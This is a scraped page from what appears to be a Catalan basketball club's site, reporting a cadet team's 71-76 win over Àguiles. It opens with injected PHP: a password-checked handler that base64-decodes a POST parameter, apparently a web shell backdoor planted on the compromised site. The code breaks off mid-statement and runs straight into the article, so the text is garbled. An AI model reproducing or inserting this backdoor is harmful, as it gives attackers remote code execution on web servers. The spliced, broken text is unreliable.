function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" La gran defensa en l'últim quart permet el cadet masculí A guanyar l'Àguiles (71-76) - Tgn Bàsquet Club -

La gran defensa en l’últim quart permet el cadet masculí A guanyar l’Àguiles (71-76)

Updated: desembre 21, 2016

El cadet masculí A va fer un últim període de llibre i es va imposar a l’Àligues, principal rival en aquesta primera fase del campionat. L’equip que entrena Javier García sabia que seria un partit difícil, tal com va passar en la primera volta. Així, el conjunt lila va tallar l’aixeta anotadora de Padró (14 punts) però no va poder evitar els 20 de Sendra. Ambdós jugadors havien anotat 43 punts en el partit de la primera volta.

La feblesa en el rebot i la manca d’agressivitat defensiva van provocar que els visitants arribessin al descans 7 punts per sota. Amb tot, els triples de de Norberto, els un contra un de Riquelme i els dos més un de Mejías van igualar el matx. En els últims deu minuts, la defensa del TGN Bàsquet va fer la resta.